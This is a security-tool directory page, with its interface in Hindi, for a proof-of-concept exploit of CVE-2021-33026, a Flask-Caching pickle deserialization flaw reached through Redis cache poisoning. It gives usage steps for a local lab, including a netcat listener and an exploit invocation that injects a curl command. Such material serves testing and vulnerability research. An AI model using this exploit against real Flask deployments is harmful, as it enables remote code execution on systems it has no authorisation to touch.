Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
FlaskCache_CVE-2021-33026_POC — CVE-2021-33026 के लिए PoC शोषण जो दुर्भावनापूर्ण pickle deserialization के माध्यम से दूरस्थ कोड निष्पादन प्राप्त करने के लिए Flask-Cache में Redis कैश को जहर देता है। | Kitploit
उपकरण/GitHubGitHub/agilevatester/flaskcache_cve-2021-33026_poc
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगरिमोट एक्सेस टूल
GitHubagilevatester/flaskcache_cve-2021-33026_poc

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

FlaskCache_CVE-2021-33026_POC

CVE-2021-33026 के लिए PoC शोषण जो दुर्भावनापूर्ण pickle deserialization के माध्यम से दूरस्थ कोड निष्पादन प्राप्त करने के लिए Flask-Cache में Redis कैश को जहर देता है।

रिपॉजिटरी देखें
128 महीने पहलेअभी तक समीक्षित नहीं
साझा करें

Pickle Serialization Remote Code Execution - Redis Poisoning PoC Exploit


Check redis server up and running

redis-cli -h 127.0.0.1 -p 6379 ping

redis-cli keys *

redis-cli get [Keyid]


Start listening netcat at port 10001 :

nc -nvlp 10001


Setting environments for Flask Chache

python -m venv venv_flask_cache_<lib_ver>

source venv_flask_cache_<lib_ver>\scripts\activate

pip install -r <requirement.txt>

Setting environments for Flask Chache 2.3.0

Run Flask App and create cache Key :

flask run

curl --header "Content-Type: application/json" --request POST --data {"key":"Cachelib_2.3"} http://localhost:5000/cache/new

Get the cache key value from Flask App

curl --request GET http://localhost:5000/cache/[key]

Exploiting Flask Cache by poisoning Redis Cache :

cve-2021-33026_PoC.py --rhost 127.0.0.1 --rport 5000 --cacheType redis --cmd "curl http://localhost:10001" --id 41685a90-434e-4d70-9a08-35b78025e09a

टूल डाउनलोड करें